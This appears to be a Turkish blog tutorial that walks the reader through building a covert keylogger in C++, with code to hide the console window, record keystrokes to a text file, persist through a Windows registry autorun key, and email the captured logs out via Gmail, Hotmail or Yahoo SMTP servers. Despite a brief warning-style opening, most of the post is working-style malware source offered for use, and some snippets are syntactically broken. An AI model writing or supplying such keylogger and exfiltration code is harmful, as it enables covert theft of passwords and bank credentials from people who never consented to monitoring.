hacker-anonymous-franz-sischer-erbeutet-euro-mit-trojaner-614984

Daha önce hiç internet hesaplarınız çalındı mı? Peki ya banka hesap bilgileriniz?  Bilgisayarınızda hiç farketmediğiniz bir anda yüklenmiş ve hiç farketmediğiniz bir şekilde çalışan bir keylogger program varsa, hesaplarınız çalınmak üzere demektir.  Bu tür programlar, klavyeyeden basılan karakterleri bilgisayar üzerinde herhangi bir text dosyasına kaydeder ve bilgisayar internete bağlandığında bu bilgiler istenilen sunucuya ve ya kişisel bilgisayara yönlendirir.  Ve siz kurban olarak hiç bir şeyden haberiniz yokken bilgisayar üzerinden herhangi bir hesabınıza ulaşmak istediğinizde… ta taa… Tüm hesap bilgilerinizi kendi elinizle bilgisayar korsanına teslim etmiş olursunuz.

 

Böyle bir programı bir çok dilde yazabilirsiniz. Fakat ben c++ ile yazılmış örnek programları vereceğim.

Mesela c++ ile klavyeden basılan karakterleri bir text dosyasına yazdırmak çok basit bir programlama algoritması gerektirir.

# include <stdio.h>
# include <conio.h>
# include <windows.h>
# include <winuser.h>
# include <iostream.h>

int main ( void )
{
int cha;
char ch;
FILE *fptr; //dosya oluşturuluyor
HWND stealth; //Program çalışırken gözükmemesi için yazılan kod*/
AllocConsole(); // Program her daim klavyeden gelen bilgiyi bu fonksiyon sayesinde alır.*/
stealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);
while(1)
{
if ( kbhit() )
{
ch = getch(); // klavyeden alınan değer ch değişkenine aktarılıyor
cha = ch; // bu bilgiler integer değerlerine çevriliyor
fptr = fopen("KEYS.TXT", "a+"); 
fputc(ch,fptr); // bilgiler keys.txt dosyasına yazılır
fclose(fptr); // dosya kapatılır. 

}
}
}

Şimdi böyle bir program pek kullanışlı olmaz çünkü bir kere kullanıcı bilgisayarı açıp kapattığında bu program çalışmayacağı için bilgileri kaydetmeyecektir. Bu yüzden windows başlarken otomatik olarak çalışan bir program olması gerekir.  Bu yüzden windows’un kayıt defterinden faydalanmamız gerekiyor.  Yazdığınız programı windows’un kayıt defterine otomatik başlatılacak program olarak kaydediyoruz. Bunu da yine iki satır kod ile yazıyoruz.

# include <windows> // bu kütüphaneyi eklememiz gerekli
HKEY hKey; // kayıt oluşturuyoruz
  LPCTSTR sk = TEXT("path"); // programın olduğu dizini

// kayıt defterini açıyoruz

  LONG openRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sk, 0, KEY_ALL_ACCESS , &hKey;

//kayıt defterine kaydediyoruz

LONG setRes = RegSetValueEx (hKey, "herhangi bir isim", 0, REG_SZ, (LPBYTE)data, strlen(data)+1);

LONG closeOut = RegCloseKey(hKey); // kayıt defterini kapatıyoruz

Böylece bu program windows her açılırken lokal makinada windows hizmeti gibi çalışacaktır.

Son olarak üçüncü yani bu bilgileri yönlendirme aşaması geçelim. Bu aşmada bilgileri internet bağlantısı ile istediğiniz bir mail adresine göndermek. Bunun için yine çok çeşitli yöntemler kullanılabilir. Fakat ben biraz daha basite kaçarak hazır bir kütüphane kullanacam.  Adresi şurada;

http://www.codeproject.com/KB/IP/smtp_ssl.aspx?fid=1581585&df=90&mpp=10&noise=3&prof=True&sort=Position&view=Quick&select=4100122&fr=31

Bu adamın yazdığı kütüphane çok hoşuma gitti. İşleri oldukça basitleştirmiş. Sana kalan sadece yine bir kaç satır kod yazmak kalıyor.  Kütüphaneyi programınıza dahil ettikten sonra şu kodları kullanıyorsunuz;

#define test_gmail_tls
  CSmtp mail; // mail nesnesi tanımlanıyor

// Aşağıda hotmail, gmail, yahoo gibi mail sunucuları tanımlanıyor
#if defined(test_gmail_tls)
  mail.SetSMTPServer("smtp.gmail.com",587); // Mailin gönderileceği ilk adres
  mail.SetSecurityType(USE_TLS);
#elif defined(test_gmail_ssl)
  mail.SetSMTPServer("smtp.gmail.com",465); //Mailin gönderileceği ilk adres
  mail.SetSecurityType(USE_SSL);
#elif defined(test_hotmail_TLS) //Mailin gönderileceği ilk adres
  mail.SetSMTPServer("smtp.live.com",25); 
  mail.SetSecurityType(USE_TLS);
#elif defined(test_aol_tls) 
  mail.SetSMTPServer("smtp.aol.com",587);
  mail.SetSecurityType(USE_TLS);
#elif defined(test_yahoo_ssl)
  mail.SetSMTPServer("plus.smtp.mail.yahoo.com",465);
  mail.SetSecurityType(USE_SSL);
#endif


 
  mail.SetLogin("***"); // Mailinizin kullnıcı adı
  mail.SetPassword("***"); // şifresi
  mail.SetSenderName("User"); // Burada gönderici ismini giriyorsunuz
  mail.SetSenderMail("Gönderici Mail Adresi");
  mail.AddSubject("Mail Başlığı");
  mail.AddRecipient("Alıcı Mail Adresi");
  mail.AddMsgLine("Mesaj Satırı Ekler");
  mail.Send(); // Maili Gönder

Hadi kolay gelsin.

 

 

1 Yorum

CEVAP VER

Please enter your comment!
Please enter your name here